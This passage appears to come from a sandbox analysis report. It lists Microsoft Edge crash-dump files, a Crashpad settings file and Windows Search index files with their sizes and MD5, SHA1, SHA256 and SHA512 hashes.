                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  6c9c22e7b9de2b7be37c3a9fb5b6eaa3

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3d3f27872c855cbc6ea0f1fcdeeb7efabce8617e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5ee8b36babb1a8088bfef94b05c226895351986c3696d9a441f0aec8a67d93fa

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4497ff4cf2aa6672900a8db4acf7f61db6d5dd88d81e794c873ebb3710fd35b8f7acafed69913a9975dc89cd8322faee3060a843ab73b91b999d3561a8ecbc50

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\18b9a341-c627-49ef-9df7-5a87462409df.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  fae2d2313c144a696c8aa26e95460128

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ac2b86d4e13ca8ab30718f006916ebce0f14a3b4

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3c754a649ad9f68653ba454bea09251c213f9547528fdc075ce3edc6b93cb396

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  e1014255de753bd8242705fd4d368827e0ad27e3bd353b9ecd1697c5996eae95b2d2f4c32bb0750e3a457345feedaa31327079a439deb68546ed8b1cbb2be5bd

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\1c5a5a10-091d-4e63-9944-9655ebf9504f.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  7f01127bfc56ef1c265ddf3a6d28317b

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1bca2a0d5527b9b25eacfc713e7b5401f97cfb14

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  c7d4b24e7d4d238b414cd2f2373382e1a27d8744e99bdf9652c478d7fcaf8b1c

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  aa8bca630d08198e8e633e27347bea029d15f346f2e5b57a2d497689206bf42b73b3957c29a79913707c3460e68a2b6b154d84cf3fdbc2517c99a875d5ddd1e5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\288e0d94-7c09-4966-88bd-7e4a43af8a48.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ac5353f63c4511d0ffd82129acc35c91

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  a6feaa41d30146b4252328a32600d4a5005d6a1b

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  7eadd89327fa1bad30dd46b814c4881788151f9eab26605d2ee42da79e605d42

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1a226ae91a2d7155c6cb5d66fade4c476a991380923a1f4ec092f302019b14dee27e990cdc15ecac25ddd5b1d6cc913d599c7e91710aef0cb89844ffde7cbd43

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\3be4ab5e-fcea-4880-ade5-480b88fc7261.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  11e5ddb8b77882f864142518d6cde2f9

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  fbe8c72b9d215412d4c7ba7db97119f193f88ce7

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  60105f41b9905fd70a8678c7f835e41f11dac7c1ab7a3c29de56178bc18bee06

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  6769f7221860bc8527e749d54b211a1f448dfa3d5c5b38240a0e1feee0634d68e9ee9c60dfd942093f0d560119a78e4938a06007f514dc6c78ecc5f481334d19

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\5b5f5c4c-c1f5-4544-ac24-57823f559a46.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  b735b77da2f541361811a99221d09d18

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5f2fa74268f038ac40763e2594930d3338a59e93

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3f29393c0dcd45f81f4bbf9d9d65c877e0644a0fac10397c649d6f0d90c04208

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  da682dbf39e65eaefc9ec6ed199330a46bef8b5dd64b474487057f53527f6357d521746318657ab97f8a7b2ef3362109a8079a8d5b9b250bfd2ebdb4d0234314

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\6af4033b-9b79-4f1a-a456-85686d2503ff.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  f7e8139a0c4aad47459eccd80d7ac561

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  12fc69c8330fe400b77ff766e182ba80a8bc4ead

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  21c32070babf0b0f523f3b404b040d1c5fc070759286671aa8d8e3c90312cf01

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  af7ac727bed0bbf152c432d28baa0659828c5ae6f7617926fdd8414c557f39790e9e73c36adeadfcfc7f075ac95d5a3aed122b146515e9cc13e1ff41f8f7ce87

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\706f5731-33f8-46e1-b726-e0afe95f07c4.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  b9ef35bca0445f3de0c66c7a062b465f

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1b14ba18b8e009080560214776385904b78848fb

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  609c03f4528ebf84f299ca98f43bb7065caf8ecad81891e8acb2ca44be3a6c55

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  c8a9c61c2313d865df04278f8e0a452f43f39eab69653e704f6bd973f599c6d76127e1561d324e568e5dad45cd8711c05ed08b6dec7e8c25baed86dac0ec28af

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\74c100ea-b998-4bc2-8a40-457509974144.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  49eb4ce3345c1d41c1f4236ffddd5284

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  911768303669e7aa039fec7cb5d9e8e0afdfeaf2

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2d3d178efc1f80a4b97604958029c7f1d79f114a3c3b27473428a3bec9387f13

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  c951c2623b17795233166e4d80581092744757352a8a734ff0f505dbd369a99b6611df643cd3d2a789b8dfcc8323a99eea0523b89c5317436b28b4ec849ae3b0

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\781ee3c0-c8da-436f-97ae-566798db988c.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  12c21736c432d96d9e01ad5cf85c5148

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2c090be6516e6185641d861014d58d49735406f3

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  c0c6aa442f29b98a6e436ae1ba2a694402852e1ba6b7684843402120af591cf6

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2c54704dc5f510dab289703cc221bb959b83171d083c639adbd1f9085f49e931d5b0c7af6ffbd66066a07f0a46c1dd6a0bb4753e987adb1d5f810013d4ded716

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\7e1e1cd9-e077-4466-84d4-969814cb69f8.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  de9de0365db5f3c2058650c7654d2407

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  e40b5b39454e7602d7891289c3d400b98bce335b

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  d22cce45daf889e0ed8eccacee9ab92913fa60f72348f3451afbe8cc66cf448e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  66d25a72c74a09982b29ebd22995b617eb54f282248d65f71d0800b8114f508b3a65e7ca0828a9e4b4c0fd991adaf0e1c1025bfc81b7bfaf38ca89a9905841dc

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\922986db-7d3f-43ce-8414-9eefbf1df135.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  eb31994391a88fb8b9671a0645294718

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  7920d55a28a07a7374a1fa287335bab340c6398c

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  84a65b6b77a101864f7286d990735426178bf30b2d7d10ff22c4aa35d20202bc

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  a0c5b7d1ac828d8ec977ad8fb8e4c175f6daee3a04b0f3d781daeaae7e3fb3e8c0331201837e586d20c1d290706bb39884bc12c3bc403745830f16e1533954b4

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\9858c29d-3785-4af1-9ece-a4d47760b0b9.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  65c2f5a9de1dad424676f6f4de42a2c2

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  bfc6fe43e1606d0b5407fe239caa338f35dbd17f

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  381b1cc1b0260260cffbb165ff10552e9b35a085c2527e65624e377dfe3a8684

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  369620f3ef788774cc5468756683e194a3f3eb3a0494676468af384c8415141caeae90832ad22d29054ec6c408bdf986a16cb360233fcb391fe7f41f341a6174

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\a19ffefa-a983-4960-ad6d-6780d9881076.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  9d0265a1f954baa47a0477582f51b49e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  0f5e23adab10dbbf6dc0181fd0e6b713a9c5ca77

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  572bc2ed2a656807014e5b471b44453e5ea45aaa76997dc288cbc92af2323b39

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  f54e878ed294e4975fef50192dde9ddddadd03ff9b25c4b1c9df4f1858488c1ee155c019f14ed42741b7b8b1ff35789ee00fb012de9bb33724f703603beacbba

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\d85d820d-bc16-4ee3-acd9-70406ed28a9f.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3414f5e0836d42393bbb4ec1640afb30

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  01b9ff61d9489b3038d484d76b1e6e61a1f03e8a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  b8ef048f026e381dae30566c71ea83ae71c02bd880e606491888f92f8d8ef4b7

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  54a3b27dbbbf305b7985990358d59e7ee3889a5fe6b51b9fc29db3853278a75ffdab1e71c65801c91fd11340ef4795885a08942552e88edd51612aa9d1d0a3f9

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\dc20e3bb-5c80-4f7f-ab19-4689aeda849b.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  7748026cf78f54cd6357461852c46e0e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  d849675cf17f71bd8393786351edd13a117e120d

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  70c70f67e0d0d8e48e48928636092165203538a9b6aaa9485962f8d3d7b3e7e4

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3e3287ce69c97a7365f75a5ab5f400b3a6c198c20c9af911e01ca813bda38d3a02fac7afb24aa4674ee4fb34210b3aac237f6cc3488a4edb530d54a48bebbff9

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\dfeca592-dbbe-459e-a01a-38b0352e0770.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4c3dd4d2c036c00e840dd6d1428eadd5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  9640bb5bd998e49b10968211d3d1c6e802a7b215

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2d67c307dadd4f34d81f6397a191ccf43f26e05e4104f40ff2d98977ab0e0a10

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2aed3ce7972d8a3597efd064a2a377791f30a7bea8f20514aa2a157349b19366b513ef899d3f7839f69ff0ae9471552845df501a4de8a7305ddce3523542e786

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\fc40bca4-add3-4dec-a644-f21ea225e6fb.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  135a79fa0c4028a5063c98e8d5c50286

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  28353a8e890c56c1c5453f62679aa1ed22eab773

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  15dbcf506b908d1edcd9a85437928f3a1de44844291a9aab451e67e2b752ec9f

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1e0e8c449b53b77d9075ac8bc8896965632fce728c31366588cc4f79ec7ab488e6e6860aa7701de7aa38285da29b90cafcb94b2a7e3adbd076e498cc2c48a0aa

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  152B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  dff2e8c71534b79741dc709d35734cfc

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1475ad925c8e51193f62234f29bcb4f1f0845348

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  688b4a8c2b20dc86404c5aee6cc4beb5ea4a8f5c640211e42671237c1e04f111

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  cb2d1db890b23d62b20bd10127d937b5e075a9c09485c1c6ea211c8c1be23971a3e3b3ae2a861cc6aea8cde715bc928fd609295262f70676384c14dd2b7c7c57

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{a95e4a38-f6a0-4082-b349-5e18b24a1ccf}\0.0.filtertrie.intermediate.txt

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  11KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  8fbbf12dcd8a07d827de5f2509753475

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4d9ee191d7049b8de7aae6ba3535e6abae9dbf29

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  a7518375d7fe59aaa62f961d6b75643fea35172ca477df998b98cdb087da4cc4

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  707dc1f57fd81bd4f129db11c5108c40d45f2729ba075ee0344a1e1af2f6849252ff174e71edb8a9f0eec84ccd4253e3776d0f05382f1c3f8be9b71d86a1ea7f

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{a95e4a38-f6a0-4082-b349-5e18b24a1ccf}\0.1.filtertrie.intermediate.txt

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  34bd1dfb9f72cf4f86e6df6da0a9e49a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5f96d66f33c81c0b10df2128d3860e3cb7e89563

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  8e1e6a3d56796a245d0c7b0849548932fee803bbdb03f6e289495830e017f14c

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  e3787de7c4bc70ca62234d9a4cdc6bd665bffa66debe3851ee3e8e49e7498b9f1cbc01294bf5e9f75de13fb78d05879e82fa4b89ee45623fe5bf7ac7e48eda96

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{a95e4a38-f6a0-4082-b349-5e18b24a1ccf}\0.2.filtertrie.intermediate.txt

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5B

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  c204e9faaf8565ad333828beff2d786e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  7d23864f5e2a12c1a5f93b555d2d3e7c8f78eec1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  d65b6a3bf11a27a1ced1f7e98082246e40cf01289fd47fe4a5ed46c221f2f73f

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  e72f4f79a4ae2e5e40a41b322bc0408a6dec282f90e01e0a8aaedf9fb9d6f04a60f45a844595727539c1643328e9c1b989b90785271cc30a6550bbda6b1909f8

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{a95e4a38-f6a0-4082-b349-5e18b24a1ccf}\Apps.ft

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  15KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  01d7df6f0942d93f8b86eb5faa6376b8

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  f4c1ed7b1ade431fff0cab6424ae93517b291b33

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  42e5b4359550b4a3f9993df1625bd42df0b8f11f51d9b49c703994fdab1e80c0

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ffed40dd5c8411092d34bccbf6cbbf2871bc2623023d79cbd8af92976e5f8dfabe4cf03c622eb4a39e5fed8ca724a7ab07a9db4607558b77228bda62ba913804

